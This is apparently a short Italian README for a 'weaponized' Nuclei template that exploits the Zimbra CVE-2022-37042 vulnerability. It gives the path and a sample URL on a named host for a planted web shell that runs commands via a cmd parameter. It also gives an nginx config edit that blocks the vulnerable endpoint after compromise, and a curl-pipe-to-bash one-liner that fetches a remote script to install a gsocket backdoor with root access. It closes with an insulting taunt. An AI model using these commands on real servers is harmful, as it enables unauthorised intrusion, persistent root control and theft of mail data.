
Template weaponizzato Nuclei per Zimbra CVE-2022-37042
percorso della shell: /public/formatter.jsp
Nuclei stesso: https://github.com/projectdiscovery/nuclei
La shell ha un input nascosto con opacità 0, quindi basta passare il mouse sopra, digitare il comando e premere il tasto [Invio]:
URL di esempio della shell:
https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
esegui questo comando (solo una volta):
cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
serve codice aggiuntivo per i server che non usano Nginx ma Apache. Le pull request sono benvenute.
curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
questo comando installerà global-socket (https://www.gsocket.io/deploy/) e ti passerà la chiave per connetterti come root.
buon compleanno massacro, figli di puttana ;)